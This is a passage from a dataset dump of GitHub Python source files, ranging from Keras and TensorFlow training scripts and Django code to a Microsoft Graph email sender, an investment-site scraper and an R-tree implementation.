model.fit_generator(train_generator, steps_per_epoch = 100,\n epochs = 30, validation_data = validation_generator,\n validation_steps = 50)\n'''Plot the model's training accuracy and validation accuracy'''\nmodel.save('cats_and_dogs_small_1.h5')\nimport matplotlib.pyplot as plt\n\nacc = history.history['acc']\nval_acc = history.history['val_acc']\nloss = history.history['loss']\nval_loss = history.history['val_loss']\n\nepochs = range(1, len(acc) + 1)\n\n# Plot the model's accuracy on the training and validation data\nplt.plot(epochs, acc, 'bo', label = 'training acc')\nplt.plot(epochs, val_acc, 'b', label = 'validation acc')\nplt.title('Training and validation accuracy')\nplt.legend()\n\nplt.show()\nplt.figure()\n\n# Plot the model's loss on the training and validation data\nplt.plot(epochs, loss, 'bo', label = 'Training loss')\nplt.plot(epochs, val_loss, 'b', label = 'Validation loss')\nplt.title('Training and validation loss')\nplt.legend()\n\nplt.show()\n\n'''Data augmentation to prevent overfitting'''\n# rotation_range rotates the image, width_shift and height_shift stretch its width and height,\n# shear_range sets the shearing intensity, zoom_range zooms the image in and out,\n# horizontal_flip flips the image horizontally, and fill_mode says how to fill the extra space a transform creates\ndatagen = ImageDataGenerator(rotation_range = 40, width_shift_range = 0.2, height_shift_range = 0.2,\n shear_range = 0.2, zoom_range = 0.2, horizontal_flip = True, fill_mode = 'nearest')","repo_name":"strawsyz/neural_network_study","sub_path":"catdognet.py","file_name":"catdognet.py","file_ext":"py","file_size_in_byte":8114,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
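A minimal inference sketch for the model saved above (same old-style Keras API as the record itself; the image filename is hypothetical):

from keras.models import load_model
from keras.preprocessing import image
import numpy as np

model = load_model('cats_and_dogs_small_1.h5')
img = image.load_img('my_pet.jpg', target_size=(150, 150))  # hypothetical file
x = np.expand_dims(image.img_to_array(img) / 255.0, axis=0)  # mirror rescale=1./255
score = model.predict(x)[0][0]  # flow_from_directory labels alphabetically: cats=0, dogs=1
print('dog' if score > 0.5 else 'cat')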
+{"seq_id":"21769331813","text":"from django.template import Context, loader\n\n\nclass WidgetBase(type):\n\tdef __new__(cls,name,bases,attrs):\n\t\tsuper_new = super(WidgetBase,cls).__new__\n\t\tparents = [b for b in bases if isinstance(b, WidgetBase)]\n\t\tif not parents:\n\t\t\treturn super_new(cls, name, bases, attrs)\n\t\tmodule = attrs.pop('__module__')\n\t\tnew_cls = super_new(cls,name,bases,{'__module__':module})\n\t\tfields = {}\n\t\tfor attr in attrs:\n\t\t\tfields[attr] = attrs[attr]\n\t\t\n\t\tsetattr(new_cls,'_fields',fields)\n\t\t\n\t\treturn new_cls\n\n\nclass Widget(object):\n\t__metaclass__ = WidgetBase\n\t\n\tclass Tpl:\n\t\tpass\n\t\n\tdef __init__(self,*args,**kwargs):\n\t\tname = self.__class__.__name__\n\t\t_widget = Widget.Tpl()\n\t\tfor field in self._fields:\n\t\t\tsetattr(_widget,field,self._fields[field])\n\t\tsetattr(_widget,'__name__',self.__class__.__name__)\n\t\tself.template = \"djazz/widgets/\"+_widget.__name__+\".html\"\n\t\tself._widget = _widget\n\t\n\tdef render(self):\n\t\tt = loader.get_template(self.template)\n\t\tc = Context({'widget' : self._widget })\n\t\treturn t.render(c)\n\t\t\n\nclass HelloWorld(Widget):\n\tname = \"HelloWorld Widget\"\n\tversion = \"0.1\"\n","repo_name":"fseries/djazz","sub_path":"core/widgets.py","file_name":"widgets.py","file_ext":"py","file_size_in_byte":1075,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"}
+{"seq_id":"8772123367","text":"import threading\r\nimport time\r\nimport random\r\n\r\nclass Cook(threading.Thread):\r\n def __init__(self, name, barrier):\r\n threading.Thread.__init__(self)\r\n self.name = name\r\n self.barrier = barrier\r\n\r\n def run(self):\r\n while True:\r\n print(f\"{self.name} sedang menyiapkan makanan\")\r\n time.sleep(random.randint(1,5))\r\n print(f\"{self.name} selesai menyiapkan makanan\")\r\n self.barrier.wait()\r\n\r\nclass Waiter(threading.Thread):\r\n def __init__(self, name, barrier):\r\n threading.Thread.__init__(self)\r\n self.name = name\r\n self.barrier = barrier\r\n\r\n def run(self):\r\n while True:\r\n print(f\"{self.name} sedang melayani pelanggan\")\r\n time.sleep(random.randint(1,5))\r\n print(f\"{self.name} selesai melayani pelanggan\")\r\n self.barrier.wait()\r\n\r\nclass Restaurant():\r\n def __init__(self, num_of_cooks, num_of_waiters):\r\n self.num_of_cooks = num_of_cooks\r\n self.num_of_waiters = num_of_waiters\r\n self.barrier = threading.Barrier(num_of_cooks + num_of_waiters)\r\n\r\n def start(self):\r\n cooks = []\r\n waiters = []\r\n for i in range(self.num_of_cooks):\r\n cook = Cook(f\"Koki-{i+1}\", self.barrier)\r\n cooks.append(cook)\r\n\r\n for i in range(self.num_of_waiters):\r\n waiter = Waiter(f\"Pelayan-{i+1}\", self.barrier)\r\n waiters.append(waiter)\r\n\r\n for cook in cooks:\r\n cook.start()\r\n\r\n for waiter in waiters:\r\n waiter.start()\r\n\r\n for i in range(3):\r\n print(\"Pelanggan datang\")\r\n time.sleep(random.randint(1,5))\r\n print(\"Pesanan diterima\")\r\n\r\n time.sleep(2)\r\n self.barrier.wait()\r\n print(\"Pesanan selesai\")\r\n\r\n for cook in cooks:\r\n cook.join()\r\n\r\n for waiter in waiters:\r\n waiter.join()\r\n\r\ndef main():\r\n num_of_cooks = 3\r\n num_of_waiters = 5\r\n restaurant = Restaurant(num_of_cooks, num_of_waiters)\r\n restaurant.start()\r\n\r\nif __name__ == \"__main__\":\r\n main()","repo_name":"kerjabhakti/SISTER_3A","sub_path":"Chapter002/1204013_FauziahHenniHasibuan/Barrier.py","file_name":"Barrier.py","file_ext":"py","file_size_in_byte":2131,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
+{"seq_id":"5416200485","text":"#-*-coding:utf-8 -*-\n\"\"\"\n@File: add_data.py\n@purpose: this file is used to generate mock data\n\"\"\"\n\n\nfrom .models import LongitudeLatitude, House, Underground\nfrom django.http import HttpResponse\nimport random\n\n# Add longitude/latitude information\n\ndef add_LongitudeLatitude(request):\n for j in range(2):\n if j==0:\n for i in range(180):\n for z in range(1,10):\n LongitudeLatitude.objects.create(\n longitude=\"东经{}\".format(i),\n latitude=\"南纬{}\".format(z)\n )\n LongitudeLatitude.objects.create(\n longitude=\"东经{}\".format(i),\n latitude=\"北纬{}\".format(z)\n )\n if j == 1:\n for i in range(180):\n for z in range(1, 10):\n LongitudeLatitude.objects.create(\n longitude=\"西经{}\".format(i),\n latitude=\"南纬{}\".format(z)\n )\n LongitudeLatitude.objects.create(\n longitude=\"西经{}\".format(i),\n latitude=\"北纬{}\".format(z)\n )\n return HttpResponse(\"经纬度添加成功\")\n\n\n\n# Add house information\ndef add_house(request):\n lst = LongitudeLatitude.objects.values_list(\"id\", flat=True)\n house_list = [\"别墅\", \"平房\", \"瓦房\", \"窑洞\", \"楼房\"]\n for i in range(1,100000):\n house_name = random.choice(house_list)\n House.objects.create(\n housename=house_name+str(i),\n type=house_name,\n height=random.randint(10,50),\n area=random.randint(100,1000),\n longitudelatitude_id = random.choice(lst),\n )\n return HttpResponse(\"房屋添加成功!\")\n\n\n\n# Add underground data information\ndef add_underground(request):\n lst = LongitudeLatitude.objects.values_list(\"id\", flat=True)\n for i in range(100000):\n Underground.objects.create(\n conduit = random.randint(10,100),\n collapse_height = random.randint(0,10),\n underground_height = random.randint(0,10),\n longitudelatitude_id = random.choice(lst)\n )\n return HttpResponse(\"地下信息添加成功!\")","repo_name":"liuhuanxg/image_generation","sub_path":"home/add_data.py","file_name":"add_data.py","file_ext":"py","file_size_in_byte":2268,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
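The seeding loops in add_data.py above issue one INSERT per row (roughly 100k queries per view); Django's bulk_create can batch them. A hedged sketch of the same House loop, with the models and `lst` exactly as defined in that record:

def add_house_bulk(request):
    # Same mock data as add_house above, but buffered and written in batches.
    lst = list(LongitudeLatitude.objects.values_list("id", flat=True))
    house_list = ["别墅", "平房", "瓦房", "窑洞", "楼房"]
    houses = []
    for i in range(1, 100000):
        house_name = random.choice(house_list)
        houses.append(House(
            housename=house_name + str(i),
            type=house_name,
            height=random.randint(10, 50),
            area=random.randint(100, 1000),
            longitudelatitude_id=random.choice(lst),
        ))
    # One batched INSERT per 1000 rows instead of 99999 separate queries.
    House.objects.bulk_create(houses, batch_size=1000)
    return HttpResponse("房屋添加成功!")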
+{"seq_id":"23610491610","text":"import torch.nn as nn\nimport torch\n\nfrom .common import NoisyLinear\nfrom .utils import orthogonal_initialization\n\n\nclass QNetworkBaseMeta(type):\n \"\"\"\n Useful for making sure that classes with this metaclass\n perform certain functions after being initialized\n I.e registering noisy linear layers or doing specific\n initialization\n \"\"\"\n def __call__(cls, *args, **kw):\n instance = super().__call__(*args, **kw)\n instance.register_noisy_layers()\n print('registered noisy layers: ', instance.noisy_layers)\n instance.apply(orthogonal_initialization)\n print('done orthogonal initialization')\n return instance\n\n\nclass QNetworkBase(nn.Module, metaclass=QNetworkBaseMeta):\n def __init__(self):\n super().__init__()\n self.noisy_layers = None\n\n def sample_noise(self):\n \"\"\"\n Samples noise for registered NoisyLinear layers.\n The noisy layers do an internal check for self.training\n so they will not sample noise if the model is in eval mode\n \"\"\"\n if self.noisy_net:\n for module in self.noisy_layers:\n module.sample()\n\n def register_noisy_layers(self):\n \"\"\"\n Called at the end of init by the metaclass, to register noisy linear layers.\n This is to make sample_noise() more efficient so it doesn't have to\n check all modules.\n\n \"\"\"\n self.noisy_layers = []\n for module in self.modules():\n if isinstance(module, NoisyLinear):\n self.noisy_layers.append(module)\n elif isinstance(module, QNetworkBase) and module is not self:\n curr = type(self)\n mod = type(module)\n msg = f\"Current Class ({curr}) inherits from QNetworkBase \" + \\\n f\"but wraps module ({mod}) also inheriting from \" + \\\n \"QNetworkBase. 
Ensure only one class inherits from \" + \\\n \"QNB so NoisyLinear layers only get registered once\"\n raise TypeError(msg)\n","repo_name":"Hanwant/madigan","sub_path":"madigan/modelling/net/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":2041,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"47"} +{"seq_id":"2594974299","text":"__author__ = 'Ksenia'\n\n\ndef linear_search(L, v):\n \"\"\"Linear search in the list of elements\n\n :param L: list of elements to search in\n :param v: object fot search\n :return: index of the first occurrence of v in L, or return if l is not in the list\n \"\"\"\n\n i = 0\n while i != len(L) and L[i] != v:\n i += 1\n if i == len(L):\n return -1\n else:\n return i\n\n\nif __name__ == '__main__':\n L = [1, 2, 3, 4, 5]\n v = 5\n print(linear_search(L, v))\n","repo_name":"kingdomfarfaraway/algorithms","sub_path":"linearsearch.py","file_name":"linearsearch.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"861627063","text":"from piston.resource import Resource as PistonResource\nfrom django.http import HttpResponseServerError, HttpResponseBadRequest\n\nfrom comrade.exceptions import (ComradeError, HttpResponseError, \n BadRequestError)\n\nimport commonware.log\nlogger = commonware.log.getLogger(__name__)\n\nclass Resource(PistonResource):\n def error_handler(self, error, request, method):\n if isinstance(error, ComradeError):\n logger.error(u'%s' % error)\n return _handle_comrade_exception(error)\n logger.exception(u'%s' % error)\n return super(Resource, self).error_handler(error, request, method)\n\nclass DebugResource(PistonResource):\n def error_handler(self, error, request, method):\n logger.exception(u'%s' % error)\n if 'text/html' in request.META.get('HTTP_ACCEPT', ''):\n raise\n elif isinstance(error, ComradeError):\n return _handle_comrade_exception(error)\n else:\n error.name = 'Unhandled exception'\n error.reason = str(error)\n return HttpResponseServerError(\n content=_json_error(error))\n\ndef _json_error(error):\n response = dict(name=error.name,\n reason=error.reason,\n success=False)\n return response\n\ndef _handle_comrade_exception(error):\n if isinstance(error, HttpResponseError):\n return HttpResponseServerError(\n content=_json_error(error))\n elif isinstance(error, BadRequestError):\n return HttpResponseBadRequest(\n content=_json_error(error))\n else:\n return HttpResponseServerError(\n content=_json_error(error))\n","repo_name":"bueda/django-comrade","sub_path":"comrade/piston/resources.py","file_name":"resources.py","file_ext":"py","file_size_in_byte":1656,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"47"} +{"seq_id":"17074838102","text":"import pandas as pd\r\nimport numpy as np\r\nimport tensorflow as tf\r\nimport matplotlib.pyplot as plt\r\nfrom sklearn.utils.multiclass import unique_labels\r\nfrom sklearn.metrics import confusion_matrix\r\n\r\n\r\ndef get_model(backbone, top_model, input_shape=(224, 224, 3), output_shape=4, optimizer_name='SGD', learning_rate=0.01,\r\n n_epochs=20):\r\n\r\n # Set backbone\r\n if backbone == 'vgg19':\r\n base_model = tf.keras.applications.VGG19(weights='imagenet', include_top=False, input_shape=input_shape)\r\n elif backbone == 'resnet':\r\n base_model = tf.keras.applications.ResNet50(weights='imagenet', include_top=False, input_shape=input_shape)\r\n elif backbone == 'fsconv':\r\n base_model 
= tf.keras.Sequential()\r\n base_model.add(tf.keras.layers.Conv2D(32, (3, 3), activation='relu', input_shape=input_shape, padding=\"same\"))\r\n base_model.add(tf.keras.layers.MaxPooling2D(pool_size=(2, 2)))\r\n base_model.add(tf.keras.layers.Conv2D(128, (3, 3), activation='relu', padding=\"same\"))\r\n base_model.add(tf.keras.layers.MaxPooling2D(pool_size=(2, 2)))\r\n base_model.add(tf.keras.layers.Conv2D(512, (3, 3), activation='relu', padding=\"same\"))\r\n base_model.add(tf.keras.layers.MaxPooling2D(pool_size=(2, 2)))\r\n\r\n # Set top model\r\n x = base_model.layers[-1].output\r\n if 'GAP' in top_model:\r\n x = tf.keras.layers.GlobalAveragePooling2D()(x)\r\n if 'GMP' in top_model:\r\n x = tf.keras.layers.GlobalMaxPooling2D()(x)\r\n x = tf.keras.layers.Dense(output_shape, activation='softmax', name='predictions')(x)\r\n\r\n # Join base and top model\r\n model = tf.keras.Model(base_model.input, x)\r\n\r\n # Set optimizer and learning rate\r\n if 'SGD' in optimizer_name:\r\n if 'decay' in optimizer_name:\r\n optimizer = tf.keras.optimizers.SGD(learning_rate, decay=learning_rate / n_epochs)\r\n else:\r\n optimizer = tf.keras.optimizers.SGD(learning_rate)\r\n elif 'Adam' in optimizer_name:\r\n optimizer = tf.keras.optimizers.Adam(learning_rate)\r\n elif 'Adagrad' in optimizer_name:\r\n optimizer = tf.keras.optimizers.Adagrad(lr=learning_rate, decay=learning_rate / n_epochs)\r\n else:\r\n print('Non-valid optimizer... using SGD')\r\n optimizer = tf.keras.optimizers.SGD(learning_rate)\r\n\r\n # Compile\r\n model.compile(optimizer=optimizer, loss='categorical_crossentropy', metrics=['accuracy'])\r\n print(model.summary())\r\n\r\n return model\r\n\r\n\r\ndef evaluate(refs, preds, generator, history, dir_results, labels):\r\n\r\n # Make plots for learning-curve\r\n learning_curve_plot(history, dir_results, 'lc')\r\n\r\n # Obtain confusion matrix (no normalized)\r\n ax = plot_confusion_matrix(refs, preds, np.array(labels))\r\n ax.figure.savefig(dir_results + '/cm')\r\n plt.close()\r\n\r\n\r\ndef learning_curve_plot(history, dir_out, name_out):\r\n\r\n plt.figure()\r\n plt.subplot(211)\r\n plt.plot(history.history['accuracy'])\r\n plt.plot(history.history['val_accuracy'])\r\n plt.axis([0, history.epoch[-1], 0, 1])\r\n plt.legend(['acc', 'val_acc'], loc='upper right')\r\n plt.title('learning-curve')\r\n plt.ylabel('accuracy')\r\n plt.subplot(212)\r\n plt.plot(history.history['loss'])\r\n plt.plot(history.history['val_loss'])\r\n plt.axis([0, history.epoch[-1], 0, max(history.history['loss'] + history.history['val_loss'])])\r\n plt.legend(['loss', 'val_loss'], loc='upper right')\r\n plt.ylabel('loss')\r\n plt.xlabel('epoch')\r\n plt.savefig(dir_out + '/' + name_out)\r\n plt.close()\r\n\r\n\r\ndef plot_confusion_matrix(y_true, y_pred, classes, normalize=False, title=None, cmap=plt.cm.Blues):\r\n \"\"\"\r\n This function prints and plots the confusion matrix.\r\n Normalization can be applied by setting `normalize=True`.\r\n \"\"\"\r\n if not title:\r\n if normalize:\r\n title = 'Normalized confusion matrix'\r\n else:\r\n title = 'Confusion matrix, without normalization'\r\n\r\n # Compute confusion matrix\r\n cm = confusion_matrix(y_true, y_pred)\r\n # Only use the labels that appear in the data\r\n classes = classes[unique_labels(y_true, y_pred)]\r\n if normalize:\r\n cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]\r\n print(\"Normalized confusion matrix\")\r\n else:\r\n print('Confusion matrix, without normalization')\r\n\r\n print(cm)\r\n\r\n fig, ax = plt.subplots()\r\n im = ax.imshow(cm, 
interpolation='nearest', cmap=cmap)\r\n ax.figure.colorbar(im, ax=ax)\r\n # We want to show all ticks...\r\n ax.set(xticks=np.arange(cm.shape[1]),\r\n yticks=np.arange(cm.shape[0]),\r\n # ... and label them with the respective list entries\r\n xticklabels=classes, yticklabels=classes,\r\n title=title,\r\n ylabel='True label',\r\n xlabel='Predicted label')\r\n\r\n # Rotate the tick labels and set their alignment.\r\n plt.setp(ax.get_xticklabels(), rotation=45, ha=\"right\",\r\n rotation_mode=\"anchor\")\r\n\r\n # Loop over data dimensions and create text annotations.\r\n fmt = '.2f' if normalize else 'd'\r\n thresh = cm.max() / 2.\r\n for i in range(cm.shape[0]):\r\n for j in range(cm.shape[1]):\r\n ax.text(j, i, format(cm[i, j], fmt),\r\n ha=\"center\", va=\"center\",\r\n color=\"white\" if cm[i, j] > thresh else \"black\")\r\n fig.tight_layout()\r\n return ax","repo_name":"cvblab/gleason_grading_cmpb","sub_path":"code/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":5373,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"47"} +{"seq_id":"14101519237","text":"import json\nimport os\nimport requests\nimport random\n\nimport msal\n\nfrom resources.names import names\n\n\nclient_id = '2546f553-3885-4041-b310-2b21222bd4a4'\nclient_secret = os.environ.get('AZUREAD_CLIENT_SECRET') \ntenant_id = 'ba9d7305-30ed-42ca-8b54-65d98d0f2a29'\nauthority = f\"https://login.microsoftonline.com/{tenant_id}\"\n\napp = msal.ConfidentialClientApplication(\n client_id=client_id,\n client_credential=client_secret,\n authority=authority)\n\nscopes = [\"https://graph.microsoft.com/.default\"]\n\nresult = None\nresult = app.acquire_token_silent(scopes, account=None)\n\nif not result:\n print(\n \"No suitable token exists in cache. 
Let's get a new one from Azure Active Directory.\")\n result = app.acquire_token_for_client(scopes=scopes)\n\nif \"access_token\" in result:\n print(\"Access token is \" + result[\"access_token\"])\n\n\nif \"access_token\" in result:\n userId = \"mikalst@mikalst.onmicrosoft.com\"\n endpoint = f'https://graph.microsoft.com/v1.0/users/{userId}/sendMail'\n toUserEmail = \"mikal.stapnes@visma.com\"\n\n hemmelig_venn = names[random.randint(0, len(names) - 1)][\"name\"]\n budsjett = round(random.expovariate(0.005).real)\n\n email_msg = {'Message': {'Subject': f\"Hei, din hemmelige venn er {hemmelig_venn}\",\n 'Body': {'ContentType': 'Text', 'Content': f\"og budsjettet ditt er {budsjett} ,- \"},\n 'ToRecipients': [{'EmailAddress': {'Address': toUserEmail}}]\n },\n 'SaveToSentItems': 'true'}\n r = requests.post(endpoint, headers={'Authorization': f'Bearer {result[\"access_token\"]}'}, json=email_msg)\n if r.ok:\n print('Sent email successfully')\n else:\n print(r.json())\nelse:\n print(result.get(\"error\"))\n print(result.get(\"error_description\"))\n print(result.get(\"correlation_id\"))","repo_name":"mikalst/fagkveld-sendgrid","sub_path":"graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":1840,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
+{"seq_id":"17989120602","text":"from django import forms\nfrom doubleboard.models import QuestionDouble, AnswerDouble, CommentDouble\n\n# QuestionDoubleForm is a form tied to the QuestionDouble model, defined to use subject and content as its fields\nclass QuestionDoubleForm(forms.ModelForm): # A ModelForm is a form linked to a Model; saving the form saves the linked model's data.\n class Meta: # The Meta class must list the model to use and the model's fields.\n model = QuestionDouble\n fields = ['subject_double', 'content_double']\n\n labels = {\n 'subject_double': '제목',\n 'content_double': '내용',\n }\n\nclass AnswerDoubleForm(forms.ModelForm):\n class Meta:\n model = AnswerDouble\n fields = ['content_double']\n labels = {\n 'content_double': '답변내용',\n }\n\nclass CommentDoubleForm(forms.ModelForm):\n class Meta:\n model = CommentDouble\n fields = ['content_double']\n labels = {\n 'content_double': '댓글내용',\n }","repo_name":"hs11015/django-dotcom","sub_path":"doubleboard/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1093,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
+{"seq_id":"26629327969","text":"import re\r\nimport pandas as pd\r\nimport requests\r\nfrom bs4 import BeautifulSoup as bs\r\nimport os\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.common.by import By\r\nfrom selenium.webdriver.chrome.options import Options\r\nfrom joblib import Parallel, delayed\r\nimport openpyxl\r\nimport time\r\n\r\n\r\n\r\nclass bate_lista_cdb_outros():\r\n def __init__(self):\r\n self.nome = []\r\n\r\n def inicio(self, page, months):\r\n op = Options()\r\n op.add_argument('--headless')\r\n # op.add_argument('--window-size=640,480')\r\n driver = webdriver.Chrome(executable_path='./chrome/chromedriver.exe', options=op)\r\n url = f\"https://yubb.com.br/investimentos/renda-fixa?collection_page={page}&investment_type=renda-fixa&months={months}&principal=5000.0&sort_by=net_return\"\r\n driver.get(url)\r\n soup = bs(driver.page_source, \"html.parser\")\r\n # capture the data\r\n dict_dados = self.extrator(soup)\r\n # save the data\r\n self.salva_dados(dict_dados, page)\r\n driver.quit()\r\n\r\n # saves the data\r\n def salva_dados(self, dict_dados, pagina):\r\n print(pagina)\r\n df = pd.DataFrame(dict_dados)\r\n df.to_csv(f\"./dados/6 meses/{pagina}__todos_6.csv\", encoding='utf-8', mode='a')\r\n\r\n\r\n 
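    # Added orientation comment (not in the original source): extrator below
    # pulls nine fields from each investment card, defaulting each field to
    # None via try/except, and returns them as parallel lists keyed by
    # column name, matching the call chain in inicio():
    #   soup = bs(driver.page_source, "html.parser")
    #   dados = self.extrator(soup)
    #   self.salva_dados(dados, page)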
#extrai dados\n def extrator(self, soup):\n bloco_informacoes = soup.find('div', {'class':'investmentCardContainer__body'})\n cards = bloco_informacoes.find_all('article', {'data-spec':'investments/card'})\n list_resultado_retorno = []\n list_resultado_rentabilidade = []\n list_resultado_empresa = []\n list_resultado_tag = []\n list_resultado_tipo = []\n list_resultado_rentabilidade_ano = []\n list_resultado_prazo = []\n list_resultado_distribuidor = []\n list_resultado_emissor = []\n\n for card in cards:\n info_head = card.find('header',{'class':'stack'})\n #retorno\n try:\n resultado_retorno = info_head.find('div', {'class':'results__netReturn'})\n resultado_retorno = resultado_retorno.find('span', {'class':'sugarish__whole'}).text\n resultado_retorno = resultado_retorno.replace(',', '.')\n except:\n resultado_retorno = None\n list_resultado_retorno.append(resultado_retorno)\n #rentabilidade\n try:\n resultado_rentabilidade = info_head.find('div', {'class':'results__grossYield'})\n resultado_rentabilidade = resultado_rentabilidade.find('span',{'class':'sugarish__number'}).text\n resultado_rentabilidade = resultado_rentabilidade.replace(',', '.')\n except:\n resultado_rentabilidade = None\n list_resultado_rentabilidade.append(resultado_rentabilidade)\n #empresa\n try:\n empresa = info_head.find('h3', {'class':'flex-stack font-size--s0'})\n empresa = empresa.text\n empresa = empresa.replace(',','.')\n except:\n empresa = None\n list_resultado_empresa.append(empresa)\n #tipo\n try:\n tipo = info_head.find('h4', {'class':'badge'}).text\n except:\n tipo = None\n list_resultado_tipo.append(tipo)\n #tag\n try:\n tag_classificacao = info_head.find('span',{'class':'certification__tag'}).text\n except:\n tag_classificacao = info_head.find('span',{'class':'certification__tag'})\n list_resultado_tag.append(tag_classificacao)\n # --section\n info_section = card.find('section')\n table = info_section.find('table')\n tbody = table.find('tbody')\n #rentabilidade_ano\n try:\n rentabilidade_ano = tbody.find('th', text=re.compile('Rentabilidade líquida ao ano'))\n rentabilidade_ano = rentabilidade_ano.find_next('td').text\n rentabilidade_ano = rentabilidade_ano.replace(',', '.')\n except:\n rentabilidade_ano = None\n list_resultado_rentabilidade_ano.append(rentabilidade_ano)\n #prazo_resgate\n try:\n prazo_resgate = tbody.find('th', text=re.compile('Prazo de resgate'))\n prazo_resgate = prazo_resgate.find_next('td').text\n except:\n prazo_resgate = None\n list_resultado_prazo.append(prazo_resgate)\n #distribuidor\n try:\n distribuidor = tbody.find('th', text=re.compile('Distribuidor'))\n distribuidor = distribuidor.find_next('td').text\n except:\n distribuidor = None\n list_resultado_distribuidor.append(distribuidor)\n #emissor\n try:\n emissor = tbody.find('th', text=re.compile('Emissor'))\n emissor = emissor.find_next('td').text\n except:\n emissor = None\n list_resultado_emissor.append(emissor)\n\n dict_dados = {'retorno':list_resultado_retorno,'rentabilidade':list_resultado_rentabilidade,\n 'empresa': list_resultado_empresa, 'tag': list_resultado_tag,'tipo':list_resultado_tipo,\n 'retabilidade_ano': list_resultado_rentabilidade_ano,'prazo': list_resultado_prazo,\n 'distribuidor':list_resultado_distribuidor,'emissor':list_resultado_emissor}\n\n return dict_dados\n\nif __name__ == \"__main__\":\n start = bate_lista_cdb_outros()\n p = Parallel(n_jobs=5)(delayed(start.inicio)(page,6) for page in range(1, 
21))","repo_name":"0rakul0/NPL_e_NPU","sub_path":"dados_cdb_outros.py","file_name":"dados_cdb_outros.py","file_ext":"py","file_size_in_byte":5636,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"22124080936","text":"N, K = map(int,input().split())\narr = [int(input()) for _ in range(N)]\n\nleft = 1\nright = max(arr)\n\nwhile left<=right:\n mid = (left + right) // 2\n\n cnt = 0\n for i in arr:\n cnt += i // mid\n if cnt >= K:\n answer = mid\n left = mid + 1\n else:\n right = mid - 1\nprint(answer)\n","repo_name":"zaehuun/Python-Algorithm","sub_path":"백준/이진 탐색/[1654] 랜선 자르기.py","file_name":"[1654] 랜선 자르기.py","file_ext":"py","file_size_in_byte":312,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"29008417776","text":"from django.urls import path\nfrom shared.src import cybered\n\nfrom .src.hashing import HashingPageManager\nfrom .apps import HashingConfig\nfrom .views import *\n\napp_name = HashingConfig.name\nurlpatterns = cybered.get_paginated_urls(\n [\n HashingMainPageView,\n HashingMotivationPageView,\n HashingExamplesPageView,\n HashingExamplesResultPageView,\n HashingKeyedExamplesPageView,\n HashingKeyedExamplesResultPageView,\n HashingConclusionPageView,\n HashingToolsPageView,\n ],\n HashingPageManager,\n app_name,\n)\n","repo_name":"Notgnoshi/cybersec-project","sub_path":"cybered/hashing/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"7522895583","text":"import itertools\nimport uuid\nimport application.helpers.constant as C\nimport application.helpers.io as io\nimport application.helpers.helper as helper\nimport application.helpers.getter as getter\nimport application.core.reusable as sky\n\n\n# node \nPARENT = 0\nMBB = 1\nCHILD = 2\nIS_LEAF = 3\n\n# skyline \nOBJ = 0 \nMINDIST = 1\nVALUE = 2\n\n\nclass RTree:\n def __init__(self, site_path, min_child=2, imported_data={}):\n # {node_id: [parent_id, bounding_box, child_id, is_leaf]}\n self.rtree = {int(k):v for k,v in imported_data.items()}\n self.root = self.rtree.pop(0, None) if imported_data else None\n self.min_children = min_child\n self.objects = []\n self.heap = []\n self.site_path = site_path\n\n\n def export(self):\n rtree_id = str(uuid.uuid4())\n rtree_path = getter.rtree_path(sitepath=self.site_path)\n rtree_filename = getter.rtree_path(sitepath=self.site_path, rtree_id=rtree_id,\n request=C.KEY_RTREE_FILE)\n \n # before exported, add rtree root id in the dict\n self.rtree[0] = self.root\n io.export_json(rtree_path, rtree_filename, self.rtree)\n return rtree_id\n \n\n def insert(self, obj):\n # format obj => {'id': '361',\n # 'label': 'customer-361', \n # 'val': [131, 256, 249]}\n if self.root:\n node_id = self.find_leaf(obj[C.VAL])\n self.update_node(node_id, child_id=obj)\n self.root = self.adjust_tree(node_id)\n else:\n bounding_box = self.calc_bounding_box(obj[C.VAL])\n node_id = self.create_node(None, bounding_box, obj, True)\n self.root = node_id\n\n\n def search(self, boundary=None, query_point=None):\n # reset\n self.objects = [] \n self.heap = []\n node_id = self.root\n\n # search\n if boundary:\n self.get_objects(node_id, boundary)\n if query_point:\n self.find_skyline(node_id, query_point)\n return self.objects\n\n\n def find_skyline(self, node_id, query_point):\n # BBS algorithm \n for child in self.rtree[node_id][CHILD]:\n obj = [child]\n if 
